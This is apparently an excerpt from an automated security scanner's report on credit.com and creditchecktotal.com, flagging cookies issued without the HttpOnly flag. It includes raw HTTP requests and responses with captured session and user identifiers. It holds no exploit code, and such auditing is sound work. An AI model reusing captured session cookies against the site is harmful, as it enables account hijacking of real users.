Last-Modified: Wed, 20 Apr 2011 23:58:47 GMT
Content-Length: 0
Set-Cookie: crc=; path=/; expires=Mon, 25-Apr-2011 19:46:23 GMT
Set-Cookie: cuc=1303674383496*http://www.credit.com/r/fico_score_watch_enroll/af=p39800&ag=default; path=/; expires=Mon, 25-Apr-2011 19:46:23 GMT
Content-Type: text/html
Cache-Control: max-age=180
Expires: Sun, 24 Apr 2011 19:49:23 GMT


18.438. https://www.credit.com/r/fico_score_watch_enroll/af=p39800&ag=default  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.credit.com
Path:   /r/fico_score_watch_enroll/af=p39800&ag=default

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/fico_score_watch_enroll/af=p39800&ag=default HTTP/1.1
Host: www.credit.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ex=174a3c15; JSESSIONID=cefKL-PCj0eOzdZlgdj_s; crc=; cuc=1303674383496*http://www.credit.com/r/fico_score_watch_enroll/af=p39800&ag=default

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 24 Apr 2011 19:46:39 GMT
Server: Apache/2
P3P: CP="NOI DSP COR NID CURa ADMa TAIa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Location: https://www.credit.com/ufg/affRed/equifax_ws
ETag: "4tXtsDfzwQq"
Last-Modified: Wed, 20 Apr 2011 23:58:47 GMT
Content-Length: 0
Set-Cookie: st=-7286327643316513930; path=/; secure
Content-Type: text/html
Keep-Alive: timeout=8
Connection: Keep-Alive


18.439. http://www.creditchecktotal.com/Message.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.creditchecktotal.com
Path:   /Message.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Message.aspx?PageTypeID=Contact%20Us&nav=false&WT.svl=contact&SiteVersionID=693&SiteID=100244&sc=668032&bcd=TotalCompare HTTP/1.1
Host: www.creditchecktotal.com
Proxy-Connection: keep-alive
Referer: http://www.creditchecktotal.com/default.aspx?sc=668032&bcd=TotalCompare
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=whbgr034pldyk3irdmpf0155; MachineName=IRC-P2WEB-10; OriginalReferrer=; NavigationPath=default; LastVisitDate=4/24/2011 1:44:31 PM; NavFlowID=; NumTrialDaysLeft=; UID=cf0a6e23928a43479df1fd6afa35c72f; BIGipServercreditchecktotal-web-pool=175001098.22559.0000

Response

HTTP/1.1 200 OK
Connection: keep-alive
Set-Cookie: OriginalReferrer=creditchecktotal.com; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: NavigationPath=default+Message?PageTypeID=Contact Us; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: LastVisitDate=4/24/2011 1:44:56 PM; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Date: Sun, 24 Apr 2011 20:44:56 GMT
ETag: "pvfe9d2b00fcaf09263bb51ba6370806e0"
Expires: -1
Cache-Control: no-cache
Pragma: no-cache
X-PvInfo: [S10203.C64259.A70594.RA0.G11457.U314C3AC5].[OT/html.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: none
Content-Length: 4534

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
           CreditCheck(R) Total
       </title>
       <meta name="GENERATOR" Content="Microsoft Visual Studio 7.0">
       <met
...[SNIP]...

18.440. http://www.creditchecktotal.com/javascripts/s_code.axd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.creditchecktotal.com
Path:   /javascripts/s_code.axd

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /javascripts/s_code.axd HTTP/1.1
Host: www.creditchecktotal.com
Proxy-Connection: keep-alive
Referer: http://www.creditchecktotal.com/default.aspx?sc=669023&bcd=EYypxrx2&mkwid=sEYypxrx2&pcrid=7154421312&kwid=credit%20monitoring
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=cf0a6e23928a43479df1fd6afa35c72f; MachineName=IRC-P2WEB-10; OriginalReferrer=; NavigationPath=Default; LastVisitDate=4/24/2011 1:45:13 PM; NavFlowID=; NumTrialDaysLeft=; UID=d4d0a4af417e4b0abab60afe27705d90; ASP.NET_SessionId=mgl24145ujchaomvjiwt5n55; MachineName=; OriginalReferrer=; NavigationPath=default; LastVisitDate=4/24/2011 5:34:30 PM; NavFlowID=; NumTrialDaysLeft=; BIGipServercreditchecktotal-web-pool=175263242.22559.0000

Response

HTTP/1.1 200 OK
Connection: keep-alive
Set-Cookie: OriginalReferrer=creditchecktotal.com; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: NavigationPath=default+s_code.axd; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: LastVisitDate=4/24/2011 5:34:32 PM; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Server: Microsoft-IIS/6.0
X-AspNet-Version: 1.1.4322
X-Powered-By: ASP.NET
Content-Type: text/javascript; charset=utf-8
Date: Mon, 25 Apr 2011 00:34:32 GMT
ETag: "pv29199a014faff4ac2e548e604da819d8"
Expires: Wed, 27 Apr 2011 00:34:32 GMT
Cache-Control: public, s-maxage=14400, max-age=172800
X-PvInfo: [S10202.C64259.A70594.RA70541.G11457.UD84854FD].[OT/all.OG/includes]
Vary: Accept-Encoding
Accept-Ranges: bytes
Content-Length: 65887

/* SiteCatalyst code version: H.22.1
Copyright 1997-2010 Omniture, Inc. More info available at
http://www.omniture.com */
   
if(!s_account)
var s_account = "expiglobal,expicctlive"

var s=s_gi(s
...[SNIP]...

18.441. https://www.creditchecktotal.com/ForgotLogin.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.creditchecktotal.com
Path:   /ForgotLogin.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ForgotLogin.aspx HTTP/1.1
Host: www.creditchecktotal.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=whbgr034pldyk3irdmpf0155; MachineName=IRC-P2WEB-10; NavFlowID=; NumTrialDaysLeft=; UID=cf0a6e23928a43479df1fd6afa35c72f; BIGipServercreditchecktotal-web-pool=175001098.22559.0000; OriginalReferrer=creditchecktotal.com; MachineName=IRC-P2WEB-10; OriginalReferrer=; NavigationPath=Default; LastVisitDate=4/24/2011 1:45:13 PM; NavFlowID=; NumTrialDaysLeft=; UID=d4d0a4af417e4b0abab60afe27705d90; NavigationPath=default+Message?PageTypeID=Contact Us+Message?PageTypeID=8d0a919d42899a53d56096c1+Message?PageTypeID=Contact Us8d0a919dbf39ce027681377b+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Order1+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Order1+Message?PageTypeID=Contact Us+Default+Order1+Message?PageTypeID=Contact Us+Default+Order1+Default+Message?PageTypeID=Contact Us+Order1+Default+Error+Default+Order1+Error+Default+Message?PageTypeID=Contact Us+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Login; LastVisitDate=4/24/2011 1:46:04 PM

Response

HTTP/1.1 200 OK
Connection: keep-alive
Set-Cookie: NavigationPath=default+Message?PageTypeID=Contact Us+Message?PageTypeID=8d0a919d42899a53d56096c1+Message?PageTypeID=Contact Us8d0a919dbf39ce027681377b+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Order1+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Order1+Message?PageTypeID=Contact Us+Default+Order1+Message?PageTypeID=Contact Us+Default+Order1+Default+Message?PageTypeID=Contact Us+Order1+Default+Error+Default+Order1+Error+Default+Message?PageTypeID=Contact Us+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Login+Default+Order1+Login+Order1+Login+Order1+Login+Order1+Login+Order1+Login+Order1+Login+Order1+Login+Order1+Login+ForgotLogin+Order1+Login+ForgotLogin; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: LastVisitDate=4/24/2011 1:46:17 PM; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Date: Sun, 24 Apr 2011 20:46:17 GMT
ETag: "pv7ce9ac434057bbb8f4f61539afcd878b"
Expires: -1
Cache-Control: no-cache
Pragma: no-cache
X-PvInfo: [S10203.C64259.A70594.RA0.G11457.UF02CECB7].[OT/html.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: none
Content-Length: 17721

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
           CreditCheck(R) Total
       </title>
       <meta name="GENERATOR" Content="Microsoft Visual Studio 7.0">
       <met
...[SNIP]...

18.442. https://www.creditchecktotal.com/Login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.creditchecktotal.com
Path:   /Login.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Login.aspx?SiteVersionID=693&SiteID=100244&sc=668032&bcd=TotalCompare HTTP/1.1
Host: www.creditchecktotal.com
Connection: keep-alive
Referer: http://www.creditchecktotal.com/default.aspx?sc=668032&bcd=TotalCompare
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=whbgr034pldyk3irdmpf0155; MachineName=IRC-P2WEB-10; NavFlowID=; NumTrialDaysLeft=; UID=cf0a6e23928a43479df1fd6afa35c72f; BIGipServercreditchecktotal-web-pool=175001098.22559.0000; OriginalReferrer=creditchecktotal.com; MachineName=IRC-P2WEB-10; OriginalReferrer=; NavigationPath=Default; LastVisitDate=4/24/2011 1:45:13 PM; NavFlowID=; NumTrialDaysLeft=; UID=d4d0a4af417e4b0abab60afe27705d90; NavigationPath=default+Message?PageTypeID=Contact Us+Message?PageTypeID=8d0a919d42899a53d56096c1+Message?PageTypeID=Contact Us8d0a919dbf39ce027681377b+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Order1+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Order1+Message?PageTypeID=Contact Us+Default+Order1+Message?PageTypeID=Contact Us+Default+Order1+Default+Message?PageTypeID=Contact Us+Order1+Default+Error+Default+Order1+Error+Default+Message?PageTypeID=Contact Us+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1; LastVisitDate=4/24/2011 1:45:57 PM

Response

HTTP/1.1 200 OK
Connection: keep-alive
Set-Cookie: NavigationPath=default+Message?PageTypeID=Contact Us+Message?PageTypeID=8d0a919d42899a53d56096c1+Message?PageTypeID=Contact Us8d0a919dbf39ce027681377b+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Order1+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Order1+Message?PageTypeID=Contact Us+Default+Order1+Message?PageTypeID=Contact Us+Default+Order1+Default+Message?PageTypeID=Contact Us+Order1+Default+Error+Default+Order1+Error+Default+Message?PageTypeID=Contact Us+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Login+Default+Order1+Login; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: LastVisitDate=4/24/2011 1:46:05 PM; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Date: Sun, 24 Apr 2011 20:46:05 GMT
ETag: "pvc1528d225343c67ac538d6eedf08f763"
Expires: -1
Cache-Control: no-cache
Pragma: no-cache
X-PvInfo: [S10203.C64259.A70594.RA0.G11457.U175B4979].[OT/html.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: none
Content-Length: 10015

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
           CreditCheck(R) Total
       </title>
       <meta name="GENERATOR" Content="Microsoft Visual Studio 7.0">
       <met
...[SNIP]...

18.443. https://www.creditchecktotal.com/Message.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.creditchecktotal.com
Path:   /Message.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Message.aspx?PageTypeID=SessionTimeOut HTTP/1.1
Host: www.creditchecktotal.com
Connection: keep-alive
Referer: https://www.creditchecktotal.com/Order1.aspx?areaid=22&pkgid=X2THZ&SiteVersionID=752&SiteID=100244&sc=669023&bcd=EYypxrx2
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=cf0a6e23928a43479df1fd6afa35c72f; MachineName=IRC-P2WEB-10; OriginalReferrer=; NavigationPath=Default; LastVisitDate=4/24/2011 1:45:13 PM; NavFlowID=; NumTrialDaysLeft=; UID=d4d0a4af417e4b0abab60afe27705d90; ASP.NET_SessionId=mgl24145ujchaomvjiwt5n55; MachineName=; NavFlowID=; NumTrialDaysLeft=; BIGipServercreditchecktotal-web-pool=175263242.22559.0000; OriginalReferrer=creditchecktotal.com; NavigationPath=default+s_code.axd+Order1+s_code.axd; LastVisitDate=4/24/2011 5:39:44 PM; mbox=session#1303691685768-21127#1303693858|PC#1303691685768-21127.17#1304901598|check#true#1303692058; s_pers=%20sc_chstack%3D%255B%255B'Paid%252520Non-Search'%252C'1303691693040'%255D%255D%7C1461544493040%3B%20sc_cidstack%3D%255B%255B'669023_EYypxrx2'%252C'1303691693047'%255D%255D%7C1461544493047%3B%20s_lv%3D1303691998116%7C1398299998116%3B%20s_lv_s%3DFirst%2520Visit%7C1303693798116%3B%20sc_dl%3D1%7C1303693798353%3B%20gpv_p50%3Dhttps%253A%252F%252Fwww.creditchecktotal.com%252FOrder1.aspx%253Fareaid%253D22%2526pkgid%253DX2THZ%2526SiteVersionID%253D752%2526SiteID%253D100244%2526sc%253D669023%2526bcd%253DEYypxrx2%7C1303693798375%3B%20gpv_PN%3D100244%253Aorder1.aspx%7C1303693798416%3B; s_sess=%20ttc%3D1303691986229%3B%20c_m%3Dundefined669023_EYypxrx2undefined%3B%20s_cc%3Dtrue%3B%20sc_cp_channel%3D0%3B%20sc_gvl_sc%3D669023%3B%20sc_gvl_bcd%3Deyypxrx2%3B%20SC_LINKS%3D%3B%20s_sq%3Dexpiglobal%252Cexpicctlive%253D%252526pid%25253D100244%2525253Aorder1.aspx%252526pidt%25253D1%252526oid%25253Dfunctiononclick(event)%2525257BtoggleDisplay('previousAddress_tblTogglePreviousAddress'%2525252Cfalse)%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DRADIO%3B

Response

HTTP/1.1 200 OK
Connection: keep-alive
Set-Cookie: OriginalReferrer=creditchecktotal.com; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: NavigationPath=Order1+Error+Order1+Error+Order1+Message?PageTypeID=SessionTimeOut; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: LastVisitDate=4/24/2011 6:36:24 PM; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Date: Mon, 25 Apr 2011 01:36:24 GMT
ETag: "pv0d6f85543721bcb1e56684a924a43550"
Expires: -1
Cache-Control: no-cache
Pragma: no-cache
X-PvInfo: [S10203.C64259.A70594.RA0.G11457.UD1BD9B5].[OT/html.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: none
Content-Length: 11103

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
           CreditCheck(R) Total
       </title>
       <meta name="GENERATOR" Content="Microsoft Visual Studio 7.0">
       <met
...[SNIP]...

18.444. https://www.creditchecktotal.com/Order1.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.creditchecktotal.com
Path:   /Order1.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Order1.aspx?areaid=22&pkgid=X2THZ&SiteVersionID=752&SiteID=100244&sc=669023&bcd=EYypxrx2 HTTP/1.1
Host: www.creditchecktotal.com
Connection: keep-alive
Referer: http://www.creditchecktotal.com/default.aspx?sc=669023&bcd=EYypxrx2&mkwid=sEYypxrx2&pcrid=7154421312&kwid=credit%20monitoring
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=cf0a6e23928a43479df1fd6afa35c72f; MachineName=IRC-P2WEB-10; OriginalReferrer=; NavigationPath=Default; LastVisitDate=4/24/2011 1:45:13 PM; NavFlowID=; NumTrialDaysLeft=; UID=d4d0a4af417e4b0abab60afe27705d90; ASP.NET_SessionId=mgl24145ujchaomvjiwt5n55; MachineName=; NavFlowID=; NumTrialDaysLeft=; BIGipServercreditchecktotal-web-pool=175263242.22559.0000; OriginalReferrer=creditchecktotal.com; NavigationPath=default+s_code.axd; LastVisitDate=4/24/2011 5:34:32 PM; mbox=check#true#1303691746|session#1303691685768-21127#1303693546|PC#1303691685768-21127.17#1304901288; s_pers=%20s_lv%3D1303691693010%7C1398299693010%3B%20s_lv_s%3DFirst%2520Visit%7C1303693493010%3B%20sc_chstack%3D%255B%255B'Paid%252520Non-Search'%252C'1303691693040'%255D%255D%7C1461544493040%3B%20sc_cidstack%3D%255B%255B'669023_EYypxrx2'%252C'1303691693047'%255D%255D%7C1461544493047%3B%20sc_dl%3D1%7C1303693786444%3B%20gpv_p50%3Dhttp%253A%252F%252Fwww.creditchecktotal.com%252Fdefault.aspx%253Fsc%253D669023%2526bcd%253DEYypxrx2%2526mkwid%253DsEYypxrx2%2526pcrid%253D7154421312%2526kwid%253Dcredit%252520monitoring%7C1303693786452%3B%20gpv_PN%3D100244%253Adefault.aspx%7C1303693786456%3B; s_sess=%20s_cc%3Dtrue%3B%20sc_cp_channel%3D1%3B%20ttc%3D1303691986229%3B%20sc_gvl_sc%3D669023%3B%20sc_gvl_bcd%3Deyypxrx2%3B%20c_m%3Dundefined669023_EYypxrx2undefined%3B%20SC_LINKS%3D100244%253Adefault.aspx%255E%255E%252FCobrand%252FImages%252FCreditMatter%252FGetYoursNow_btn.gif%255E%255E100244%253Adefault.aspx%2520%257C%2520%252FCobrand%252FImages%252FCreditMatter%252FGetYoursNow_btn.gif%255E%255E%3B%20s_sq%3Dexpiglobal%252Cexpicctlive%253D%252526pid%25253D100244%2525253Adefault.aspx%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.creditchecktotal.com%2525252FOrder1.aspx%2525253Fareaid%2525253D22%25252526pkgid%2525253DX2THZ%25252526SiteVersionID%2525253D752%25252526SiteID%2525253D100244_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B

Response

HTTP/1.1 200 OK
Connection: keep-alive
Set-Cookie: MachineName=; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: OriginalReferrer=creditchecktotal.com; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: NavigationPath=Order1; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: LastVisitDate=4/24/2011 6:29:14 PM; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: NavFlowID=; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: NumTrialDaysLeft=; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Date: Mon, 25 Apr 2011 01:29:15 GMT
ETag: "pv34a726d0b6fba38b350738c48c05f169"
Expires: -1
Cache-Control: no-cache
Pragma: no-cache
X-PvInfo: [S10203.C64259.A70594.RA0.G11457.UA22DB830].[OT/html.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: none
Content-Length: 26962

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
           CreditCheck(R) Total
       </title>
       <meta name="GENERATOR" Content="Microsoft Visual Studio 7.0">
       <met
...[SNIP]...

18.445. https://www.creditchecktotal.com/ajaxpro/ECD.Web.WebProcesses.bpSubmit,ECD.Web.WebProcess.SubmitAction.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.creditchecktotal.com
Path:   /ajaxpro/ECD.Web.WebProcesses.bpSubmit,ECD.Web.WebProcess.SubmitAction.ashx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ajaxpro/ECD.Web.WebProcesses.bpSubmit,ECD.Web.WebProcess.SubmitAction.ashx HTTP/1.1
Host: www.creditchecktotal.com
Connection: keep-alive
Referer: https://www.creditchecktotal.com/Order1.aspx?areaid=22&pkgid=X2THZ&SiteVersionID=752&SiteID=100244&sc=669023&bcd=EYypxrx2
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=cf0a6e23928a43479df1fd6afa35c72f; MachineName=IRC-P2WEB-10; OriginalReferrer=; NavigationPath=Default; LastVisitDate=4/24/2011 1:45:13 PM; NavFlowID=; NumTrialDaysLeft=; UID=d4d0a4af417e4b0abab60afe27705d90; ASP.NET_SessionId=mgl24145ujchaomvjiwt5n55; MachineName=; NavFlowID=; NumTrialDaysLeft=; BIGipServercreditchecktotal-web-pool=175263242.22559.0000; mbox=check#true#1303691746|session#1303691685768-21127#1303693546|PC#1303691685768-21127.17#1304901288; s_pers=%20s_lv%3D1303691693010%7C1398299693010%3B%20s_lv_s%3DFirst%2520Visit%7C1303693493010%3B%20sc_chstack%3D%255B%255B'Paid%252520Non-Search'%252C'1303691693040'%255D%255D%7C1461544493040%3B%20sc_cidstack%3D%255B%255B'669023_EYypxrx2'%252C'1303691693047'%255D%255D%7C1461544493047%3B%20sc_dl%3D1%7C1303693786444%3B%20gpv_p50%3Dhttp%253A%252F%252Fwww.creditchecktotal.com%252Fdefault.aspx%253Fsc%253D669023%2526bcd%253DEYypxrx2%2526mkwid%253DsEYypxrx2%2526pcrid%253D7154421312%2526kwid%253Dcredit%252520monitoring%7C1303693786452%3B%20gpv_PN%3D100244%253Adefault.aspx%7C1303693786456%3B; s_sess=%20s_cc%3Dtrue%3B%20sc_cp_channel%3D1%3B%20ttc%3D1303691986229%3B%20sc_gvl_sc%3D669023%3B%20sc_gvl_bcd%3Deyypxrx2%3B%20c_m%3Dundefined669023_EYypxrx2undefined%3B%20SC_LINKS%3D100244%253Adefault.aspx%255E%255E%252FCobrand%252FImages%252FCreditMatter%252FGetYoursNow_btn.gif%255E%255E100244%253Adefault.aspx%2520%257C%2520%252FCobrand%252FImages%252FCreditMatter%252FGetYoursNow_btn.gif%255E%255E%3B%20s_sq%3Dexpiglobal%252Cexpicctlive%253D%252526pid%25253D100244%2525253Adefault.aspx%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.creditchecktotal.com%2525252FOrder1.aspx%2525253Fareaid%2525253D22%25252526pkgid%2525253DX2THZ%25252526SiteVersionID%2525253D752%25252526SiteID%2525253D100244_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; OriginalReferrer=creditchecktotal.com; NavigationPath=default+s_code.axd+Order1; LastVisitDate=4/24/2011 5:39:40 PM

Response

HTTP/1.1 200 OK
Connection: keep-alive
